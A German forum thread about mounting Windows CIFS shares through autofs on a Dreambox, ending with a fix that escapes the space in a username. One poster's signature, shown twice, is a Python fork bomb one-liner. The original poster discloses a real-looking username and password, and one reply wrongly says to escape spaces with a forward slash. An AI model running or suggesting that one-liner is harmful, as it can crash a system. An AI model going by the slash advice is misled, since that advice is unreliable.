Bester Weg um cifs Mounts einzubinden?

    Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

    • Ganz einfach es ist ein Timout in sekunden nachdem das verzeichniss ausgehängt wird.
      Wenn der versucht einen Share zu mounten und nach 5sek ist immer noch nichts passiert hängt er das und gut.
      Leute das ist Linux guckt im Internet da gibt es Infos ohne ende ihr müsst euch nur bemühen dann lernt man auch was.
      linux.die.net/man/8/automount
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • irgend etwas ist noch faul ...
      gebe ich das das bei Telnet ein, kommt folgendes ...
      root@DM7080HD:~# systemctl restart autofs
      Password for Eric@//192.168.1.100/export/hdd: *******
      Job for media-m.mount failed. See 'systemctl status media-m.mount' and 'journal
      tl -xn' for details.
      Password for Eric@//192.168.1.100/export/hdd:
      root@DM7080HD:~#
      mein Username für den PC ist aber nicht nur Eric ???
    • Laut deiner auto.network hat der PC mit der Freigabe die IP 192.168.1.100, der Name der Freigabe im Windows ist M, der User der mit der Freigabe auf dem PC ist Name und das Passwort ist streaming
      Stimmt das alles? Falls nein, liegt der Fehler dort.
      Da widersprechen sich nämlich deine Angaben. Zum einen sagst du am PC keine Username und kein Passwort vergeben (Wie geht das eigentlich - Windows ohne Benutzername?), in der auto.network hast du aber Einträge dazu.

      PS: Crossposting ist für die Helfenden auf beiden Boards nicht so prickelnd.
    • @kati
      und welchen vorteil siehst du effektiv in welchen szenario auf der dreambox?
      ich hab hier mal den worst case probiert und der 7080 direkt den share im zugriff entzogen, es dauert eine ewigkeit mit spinnern bis die box wieder in den normalzustand zurückkehrt,immerhin tut es ?(
    • @Joey
      die IP meines PC`s ist 192.168.1.100, das Laufwerk auf dem PC habe ich als M freigegeben. Der Username für meinen PC ist Eric Pfitzner und das Passwort streaming.
      habe mal spaßenshalber OpenATV geflasht, da funktioniert die Freigabe wie gehabt. Kann ich aus den Einstellungen etwas ins NN2 übernehmen?
    • Wenn du ein eingebundenes dateisystem einfach so entreisst hängt das natürlich weil der kernel denkt es ist noch da hier gehts um autofs und die einstellungen.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • Ich hab mal schnell versucht das nachzuvollziehen:
      - in der enigma2.autofs den ghost Eintrag hinzugefügt (Imagestand: 04.06.2016)
      - auf dem PC (IP: 192.168.2.104 unter Username Besitzer (kein PW vergeben)) eine Freigabe mit dem Namen dbox erstellt
      - Einträge auto.network: dbox -fstype=cifs,rw,soft,rsize=8192,wsize=8192,user=Besitzer,pass=,noacl ://192.168.2.104/dbox
      - Neustart Dream
      - Ergebnis:
    • naja ich wollte hier nicht gleich meinen PC-Zugang veröffentlichen, daher "Name" bei Username ;).

      der Eintrag in der auto.network beim OpenATV sieht so aus .....
      MDESKTOPPC -fstype=cifs,user=Eric\ Pfitzner,pass=streaming,rw,iocharset=utf8 ://192.168.1.100/M

      PS: habe die Zeile mal in die auto.network vom NN2 kopiert, tataaaa Zugriff klappt :tongue:

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von Hilfsbereit () aus folgendem Grund: Ergänzung

    • ich freue mich ja auch, dass es jetzt funktioniert. Aber das entspricht keinerlei Ratschlägen die ich bisher gelesen habe. Liegt vielleicht auch an meinem Username/Passwort für den PC, womit das OE2.2 nicht zurecht kommt. Vielleicht kann man sich da mal Ausnahmsweise bei OpenATV was abgucken, wie die dass mit den Usernamen handeln *fg*. Funktionierte ja weder im DMM Original noch im NN2.
    • Parameter unter Linux sind durch Leerzeichen getrennt. Wenn du in einem Parameter ein Leerzeichen hast (wie bei dir in "user="), kannst du das Linux durch ein / vor dem Leerzeichen beibringen. Dann nimmt Linux das Leerzeichen als Sonderzeichen, welches zum Parameter gehört und interpretiert es nicht als Parameter-Trenner.

      Wenn du die auo.network mit einem Editor bearbeitest, sollte man sowas wissen und das Slash händisch mit einfügen. Ansonsten in Kennworten, Datei-, User- etc-Namen Leerzeichen immer durch "_" ersetzen.

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von Griffel ()

    • ich bin Windowsuser und hatte bis dahin nur die Ratschläge anderer User hier gelesen. Da kam wohl leider nie ein Leerzeichen bei Parametern vor. So wie OE2.2 ein Linux ist, war und ist ja auch OE2.0 oder 1.6 irgend wie Linux, und da hat das bisher auch nicht wirklich interessiert, ob ich ein Leerzeichen habe oder nicht. Abgesehen davon, sollte der Mountmanager das schon merken und dann richtig in die auto.network schreiben. OpenATV hat ja den richtigen Eintrag ja erstellt, die sind da wohl einen Schritt weiter als DMM, oder einfach nur DAU-freundlicher ;). Aber ich will ja nicht OpenATV nutzen, sondern NN2 *fg*

      trotzdem DANKE noch mal für dein Verständnis für nicht so ganz fitte Linuxnutzer ( deren Nutzung sich vorwiegend auf die Dream beschränkt ), die einfach mal nur vom OE2.0 auf OE2.2 umgestiegen sind. Leider konnte ich bei deinem Beitrag nirgends einen Ironie-Smiley finden, daher kommt das schon etwas besserwisserisch rüber. Egal, ich hab es selbst rausgefunden, habe was gelernt und hoffe, mein Thread hier hilft auch anderen weiter, die vielleicht vor dem gleichen Problem stehen, ohne es wirklich zu wissen.

      Danke noch mal an alle Helfer hier .....

      Dieser Beitrag wurde bereits 2 mal editiert, zuletzt von Hilfsbereit ()

    • ich bin Windowsuser und hatte bis dahin nur die Ratschläge anderer User hier gelesen. Da kam wohl leider nie ein Leerzeichen bei Parametern vor. So wie OE2.2 ein Linux ist, war und ist ja auch OE2.0 oder 1.6 irgend wie Linux, und da hat das bisher auch nicht wirklich interessiert, ob ich ein Leerzeichen habe oder nicht. Abgesehen davon, sollte der Mountmanager das schon merken und dann richtig in die auto.network schreiben. OpenATV hat ja den richtigen Eintrag ja erstellt, die sind da wohl einen Schritt weiter als DMM, oder einfach nur DAU-freundlicher ;). Aber ich will ja nicht OpenATV nutzen, sondern NN2 *fg*

      trotzdem DANKE noch mal für dein Verständnis für nicht so ganz fitte Linuxnutzer ( deren Nutzung sich vorwiegend auf die Dream beschränkt ), die einfach mal nur vom OE2.0 auf OE2.2 umgestiegen sind. Leider konnte ich bei deinem Beitrag nirgends einen Ironie-Smiley finden, daher kommt das schon etwas besserwisserisch rüber. Egal, ich hab es selbst rausgefunden, habe was gelernt und hoffe, mein Thread hier hilft auch anderen weiter, die vielleicht vor dem gleichen Problem stehen, ohne es wirklich zu wissen.

      Danke noch mal an alle Helfer hier .....

      Leerzeichen in Usernamen, Ordnern, Freigaben sind immer zu vermeiden. Egal, ob unter Windows, Linux oder diesem Linuxderivat mit Obstnamen.

      Keine Ironie!
      "Alle sagen: Es geht nicht!
      Bis einer kommt, der es nicht wusste
      und es einfach gemacht hat!"